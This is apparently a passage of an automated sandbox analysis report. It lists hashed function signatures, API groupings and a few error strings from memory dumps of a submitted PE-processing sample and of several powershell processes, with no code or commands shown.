                                                                                          • Opcode ID: 1cbc0dcdf469d96383d55006a5203152253f0f20c1a05c1544fc42c63d5dbbda
                                                                                          • Instruction ID: 99d6d9db286bc379e009742c4a5067b314fb2c970d1aa6f8a8ddbdb261a3bf38
                                                                                          • Opcode Fuzzy Hash: 1cbc0dcdf469d96383d55006a5203152253f0f20c1a05c1544fc42c63d5dbbda
                                                                                          • Instruction Fuzzy Hash: E7314E23E2C203C1FA14AB61A8DD3BDA3B1AF46784F680476D64DC72D3DE6DA8C4C651

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$View$CreateMappingUnmapmemmove$Size
                                                                                          • String ID: .ATOM$@
                                                                                          • API String ID: 446061512-930667443
                                                                                          • Opcode ID: 4db16023d56813c619b6a560a2264965fcc72533692b26ac0f32b99d66fa7c74
                                                                                          • Instruction ID: f6c6fcb9b4733dedb4f1a00da95b009eed3fbdbd17dc13dda92f5ba2a36af8a0
                                                                                          • Opcode Fuzzy Hash: 4db16023d56813c619b6a560a2264965fcc72533692b26ac0f32b99d66fa7c74
                                                                                          • Instruction Fuzzy Hash: E0815033A29A41C6E750CF21E88866DB7B0FB89B54F145236DA9E83B94DF3CE595C700

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 313767242-0
                                                                                          • Opcode ID: efd1cfd97ab6ddbc734f1008b619de7ec29c4480cf9123f63dd80cdb39ef4dc1
                                                                                          • Instruction ID: cac454aa2ae7ad337fe0a0d698b279ce79ac01439e5d979ddda708960c01a60c
                                                                                          • Opcode Fuzzy Hash: efd1cfd97ab6ddbc734f1008b619de7ec29c4480cf9123f63dd80cdb39ef4dc1
                                                                                          • Instruction Fuzzy Hash: 84310C73624B81CAEB608F61E8847AEB3B5FB84744F54403ADA4E87B95DF38D588C710

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: d82abbdedb5a10bf1745d74c4b3cb6bc3aa2428d30236cd128df959476fd0043
                                                                                          • Instruction ID: 627e2e9df5593c867cb42d704801ca847c1bae86e367b81d3d11c09491ee5ab3
                                                                                          • Opcode Fuzzy Hash: d82abbdedb5a10bf1745d74c4b3cb6bc3aa2428d30236cd128df959476fd0043
                                                                                          • Instruction Fuzzy Hash: 4B111826B24B05CAEB008F61E8982BD73B4FB59758F540E32DA6D867A4DF78D198C340
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: edb8eba26a419828462f04bd498d548419ecb844cbcf4a4d4fa9667a7507e451
                                                                                          • Instruction ID: 1866a241c7c4fa1d7b95887e563c6653da10c883632f45bab93cd1d0d38c5ed1
                                                                                          • Opcode Fuzzy Hash: edb8eba26a419828462f04bd498d548419ecb844cbcf4a4d4fa9667a7507e451
                                                                                          • Instruction Fuzzy Hash: 72E2BDB3B246918BE715CF28D0847AC77B5F794B4CF204236DB0A97B48DE39A985CB44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2af684903b07895a612a0ff1c83b407c1dec56938cd0142951888f76033b5fba
                                                                                          • Instruction ID: fc09d095cd97039572c378ee65ce1387a1023e0f15808c645b41c23db38e73ff
                                                                                          • Opcode Fuzzy Hash: 2af684903b07895a612a0ff1c83b407c1dec56938cd0142951888f76033b5fba
                                                                                          • Instruction Fuzzy Hash: 92526C73724692CBE7158F29E4882ADB7B4F7A4B84F544136DA89C7788DF38E581CB10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 08af3d139c253a12d3d904bb133b7ae44e6467691e30716039f3aac408a3a1f7
                                                                                          • Instruction ID: 2d51c26c37a0998e10728a39a834758ce6398d313e9cdc8d7f1d9fae1ba267f4
                                                                                          • Opcode Fuzzy Hash: 08af3d139c253a12d3d904bb133b7ae44e6467691e30716039f3aac408a3a1f7
                                                                                          • Instruction Fuzzy Hash: AC02E4B71105958BC715CF18E5A0BEC7B75F3A9348F644226DBA293745EB39E268CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 734b7cc4a1729ccac46801f5ba32c2d2719cea5d53020609d49088e0514a1b82
                                                                                          • Instruction ID: dda80a8a10d94512d829e78d695089b8ee9d5ddd7223b8ff2edc7bf6127d0aed
                                                                                          • Opcode Fuzzy Hash: 734b7cc4a1729ccac46801f5ba32c2d2719cea5d53020609d49088e0514a1b82
                                                                                          • Instruction Fuzzy Hash: 3F616D73A14645C7D768DF29928422DB7F1F748F98B20413ADB4A83B58DF38D8A6CB40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a09f5aa30f9360085c033b6dd99b3d66c76e7e2456d3110ecb487d193e64064e
                                                                                          • Instruction ID: bfa4006a3532de6d29843dd6c0fe2f3e2f74ceacb28e05fd031feddd8365a529
                                                                                          • Opcode Fuzzy Hash: a09f5aa30f9360085c033b6dd99b3d66c76e7e2456d3110ecb487d193e64064e
                                                                                          • Instruction Fuzzy Hash: 5E51D1736206518BD709DF29D4856AD77B5F794B84FA18135EA08C7788EE3CD682C740
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bb1e7ff820d716487da5ad0f80d5ff8bc6d3fddd02406cc623040adddaa62674
                                                                                          • Instruction ID: 2567b985867978b8ccb7a84a5690cd6372c648682bc07299adcabc627d0792a3
                                                                                          • Opcode Fuzzy Hash: bb1e7ff820d716487da5ad0f80d5ff8bc6d3fddd02406cc623040adddaa62674
                                                                                          • Instruction Fuzzy Hash: 9141C473A2499587EB148F18E948BADB771F754780FA56035EB4B53B88DE39F881CB00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 364e2c2454f659e17b929bd6d5a310316bd8dc7b61ece90421b3e3f6c55aecc1
                                                                                          • Instruction ID: 19ad79cbcc42af56c9a21a3f44b0503a5ccae18a84dbc5f2fa7bffbe66c2cb02
                                                                                          • Opcode Fuzzy Hash: 364e2c2454f659e17b929bd6d5a310316bd8dc7b61ece90421b3e3f6c55aecc1
                                                                                          • Instruction Fuzzy Hash: 2431639351E2D099E756863C504527CFFE0E712B04F2CDAAAD284C7293CD1DD4DAEB20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9665a3c8e7e8df648f74643c9e3837ed74489bc1e24a67a37c66135fe5326625
                                                                                          • Instruction ID: 49b0ccb8684a4f0bbbdcb9c6c5e38bf61ba02f2ba6934c499fdd5246f7410302
                                                                                          • Opcode Fuzzy Hash: 9665a3c8e7e8df648f74643c9e3837ed74489bc1e24a67a37c66135fe5326625
                                                                                          • Instruction Fuzzy Hash: 6721F9B33315A543E7428F05E584699B699F35474DB54A024FE0B5BB94C33EF452D700
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: efe3887042deae7314b967deea58ea6fa4c26b6d27909147578876e986a8bede
                                                                                          • Instruction ID: bd169c6ebda32cd9f6c6a4d6ca0e84f2ee748a5cbb04a7dd50a214b54e7c8db6
                                                                                          • Opcode Fuzzy Hash: efe3887042deae7314b967deea58ea6fa4c26b6d27909147578876e986a8bede
                                                                                          • Instruction Fuzzy Hash: 7511DD37721E0143E74C8629D9323BD2193A3C4209E98E67EDA4B8A7D9EF394426C244
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 273eaa5b208ae59fa92b979da69812e1cf336c2c554ce1a17477a53ded124dac
                                                                                          • Instruction ID: 16e689ba645ef5028513d746a4a3b3ae0a524e53f62ef12deca55d9c09839bcc
                                                                                          • Opcode Fuzzy Hash: 273eaa5b208ae59fa92b979da69812e1cf336c2c554ce1a17477a53ded124dac
                                                                                          • Instruction Fuzzy Hash: 1001A13B370D07476B4C8538DD377BD2191A3452157C8A63EEA5BC92C2EE1DC465C245
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 695b26d0a898fa640735135adb199014f920f8e20f8fc4c07d66bca64c235301
                                                                                          • Instruction ID: 1b24fa46bfa9280cf6bf1be85442d431a4debac433eda8456fd3995711a44b81
                                                                                          • Opcode Fuzzy Hash: 695b26d0a898fa640735135adb199014f920f8e20f8fc4c07d66bca64c235301
                                                                                          • Instruction Fuzzy Hash: ACA0023393CC02D8E60B8B11E9E8138A7B0EB94300BA50033C00EC21A0DF3DA5C8C704

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • printf.MSPDB140-MSVCRT ref: 00007FF674C514CD
                                                                                            • Part of subcall function 00007FF674C513F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674C51418
                                                                                            • Part of subcall function 00007FF674C513F0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674C51437
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID: __acrt_iob_func__stdio_common_vfprintfprintf
                                                                                          • String ID: [!] Please Input A Valid x64 Pe File !$[!] We Do Not Support Dll Files !$[!] We Do Not Support x32 Exe Files, Yet !
                                                                                          • API String ID: 115429112-3694449406
                                                                                          • Opcode ID: 5c87c7eb261d2e3950b85cd47c4575c5a17c827b909b6686aee65506f4d6542e
                                                                                          • Instruction ID: 4f7dfffe39cb424bc46b339bfdc085bce298f4ade972a33e3688ca1471799a12
                                                                                          • Opcode Fuzzy Hash: 5c87c7eb261d2e3950b85cd47c4575c5a17c827b909b6686aee65506f4d6542e
                                                                                          • Instruction Fuzzy Hash: 4EF03616E24502C2EE59674AD8DE2BD9261EFA4750FE00077E68EC27D2FE1CD9D6C700
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2603539386.00007FFE16620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16620000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ffe16620000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e2ee47846a40d26ca6ad4efb48b22efc69babe9b2f5a06a55caa04eb5bd6814
                                                                                          • Instruction ID: a1c5dc6f213ab2a086e21218e04c4a7ff8599faf03d28ec2761476d9d0e441a0
                                                                                          • Opcode Fuzzy Hash: 0e2ee47846a40d26ca6ad4efb48b22efc69babe9b2f5a06a55caa04eb5bd6814
                                                                                          • Instruction Fuzzy Hash: E901677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC36A1DB36E892CB46
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2604048282.00007FFE166F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE166F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ffe166f0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4ff2903e55596dcd6f028c9be28f4e0d5329bb907c7e77a892907e6d21465fb9
                                                                                          • Instruction ID: 0ff30c7af98fe5e2f92fde75179c5a6fdf2905923e8415f349a86ae074583a0e
                                                                                          • Opcode Fuzzy Hash: 4ff2903e55596dcd6f028c9be28f4e0d5329bb907c7e77a892907e6d21465fb9
                                                                                          • Instruction Fuzzy Hash: 0EF0AF32A2E94A4FEB94DB4EE4549FDB3E0FF44331B4511F6E00ED7967CA29A8458B40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2604048282.00007FFE166F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE166F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ffe166f0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6ffdbe176ada3b5d9dc3cecf5043ebc9d2e9dda7945749b7c78a96df07972496
                                                                                          • Instruction ID: 2b5fcf7fe9df2a05640c03590edea9fd23b5ac95e492d7d0918d4179fb5c8ef3
                                                                                          • Opcode Fuzzy Hash: 6ffdbe176ada3b5d9dc3cecf5043ebc9d2e9dda7945749b7c78a96df07972496
                                                                                          • Instruction Fuzzy Hash: 7A01AD31A1890ACFDB94DF09D0509E9B3F1FF88362B6400FAE04AD3165CA35EC408B40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2604048282.00007FFE166F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE166F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ffe166f0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e709d833ea057f871b368bee0ffe6a3eed21bd3dccb5876f92038f69e80ea9a5
                                                                                          • Instruction ID: 5335b7ff04de1c4b59bf1e04d9f8786a43459ca6030b6a6d22f2a7030d2b2196
                                                                                          • Opcode Fuzzy Hash: e709d833ea057f871b368bee0ffe6a3eed21bd3dccb5876f92038f69e80ea9a5
                                                                                          • Instruction Fuzzy Hash: 89F03032A2991D8FEB84EB0DD4559F9B3E1FF48321B5451B1E00DC7576DA35AC458B40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2604048282.00007FFE166F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE166F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ffe166f0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 603e75ffc02ea19d7d11f8aef4dc9672f8d4af86dfe39a1263bfb6a75777b230
                                                                                          • Instruction ID: c3d0cf532f36c9cb43a738983fb6690709e6a324826bf59bfbcd6a3b70da1016
                                                                                          • Opcode Fuzzy Hash: 603e75ffc02ea19d7d11f8aef4dc9672f8d4af86dfe39a1263bfb6a75777b230
                                                                                          • Instruction Fuzzy Hash: 3FF0F231A2890ACFDB80EF09D4859E8B3E0FF49362B9400B2E40AC3165DA21AC958B40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1@_L$80"$80"
                                                                                          • API String ID: 0-3479483465
                                                                                          • Opcode ID: be3a27c168c09a1dd93219aaa3a88f5a526868afd3a0bff859345a33f696b1c9
                                                                                          • Instruction ID: 8f0ccd1163c2427333dd35c5f34c904d4273e972fe10de3251720d7d3667e3a4
                                                                                          • Opcode Fuzzy Hash: be3a27c168c09a1dd93219aaa3a88f5a526868afd3a0bff859345a33f696b1c9
                                                                                          • Instruction Fuzzy Hash: 5E21A571209A449FC71DEF28E06B9697BE0EF65304710459ED087CF272DA32A946CB84
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 80"$80"
                                                                                          • API String ID: 0-2073002175
                                                                                          • Opcode ID: 1ec5ff92404baa2a45cc771f192464ad9c1303e12fc4a7c830b946422d427a99
                                                                                          • Instruction ID: 02296c3e73aeb425ad23c6bd867a47223b72a542b2e064a3f1a4097731f8a20a
                                                                                          • Opcode Fuzzy Hash: 1ec5ff92404baa2a45cc771f192464ad9c1303e12fc4a7c830b946422d427a99
                                                                                          • Instruction Fuzzy Hash: FA31E87120EB449FCB1DEF38E06A9697BA0EF6630471005CDD087CF272CA329549CB45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 80"$80"
                                                                                          • API String ID: 0-2073002175
                                                                                          • Opcode ID: 50035e156ea48d44b077d21d1e738cbc72221ad1187db1f27a26bc19a8d333b8
                                                                                          • Instruction ID: be12628d13ee48f77a2128dd69d439587ccb6d9b9b812b0379be6345c35987fa
                                                                                          • Opcode Fuzzy Hash: 50035e156ea48d44b077d21d1e738cbc72221ad1187db1f27a26bc19a8d333b8
                                                                                          • Instruction Fuzzy Hash: C221A571209B449FC71DAF38E06B9657BE0EF65708710459DD087CB272DA32A546CB45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 80"$80"
                                                                                          • API String ID: 0-2073002175
                                                                                          • Opcode ID: b638d63643509a14c83cc5562ab62cd74bd16848016f95dc8dce7e849b369b1b
                                                                                          • Instruction ID: f3122bb1ebafedd9db9c91a2155657012ea4449b072118b6bd654f8f4325a32a
                                                                                          • Opcode Fuzzy Hash: b638d63643509a14c83cc5562ab62cd74bd16848016f95dc8dce7e849b369b1b
                                                                                          • Instruction Fuzzy Hash: 2F11B47120EA449FC71DEF38E42F9697BE0EF55314710499DD087CB272DA32A945CB84
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2822016158.00007FFE16640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16640000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16640000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e794b03c83db380118aecd4ca34316c4d2da315b10257bf801414b24c4aeb346
                                                                                          • Instruction ID: c3c28a2c5061f87a63d11967321dc723ac383600a9bdf29cd8af4047d636c219
                                                                                          • Opcode Fuzzy Hash: e794b03c83db380118aecd4ca34316c4d2da315b10257bf801414b24c4aeb346
                                                                                          • Instruction Fuzzy Hash: FA01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB46
                                                                                          Memory Dump Source
